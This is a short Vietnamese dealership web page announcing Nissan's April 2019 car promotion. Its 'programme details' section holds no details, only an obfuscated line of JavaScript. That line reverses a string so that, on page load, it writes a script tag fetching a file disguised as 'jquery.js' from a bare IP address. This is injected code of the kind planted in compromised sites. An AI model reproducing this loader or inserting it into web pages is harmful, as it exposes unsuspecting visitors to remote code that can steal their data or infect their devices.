Chương trình khuyến mại tháng 04/2019

Nissan Lê Văn Lương  xin trân trọng thông báo Chương trình Khuyến mại tháng 04/2019 dành cho các khách hàng mua xe Nissan X-Trail, SunnyNavara và Terra.

Phạm vi: Chương trình áp dụng tại hệ thống Đại lý chính hãng của Nissan trên toàn quốc.

Chi tiết chương trình:

document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))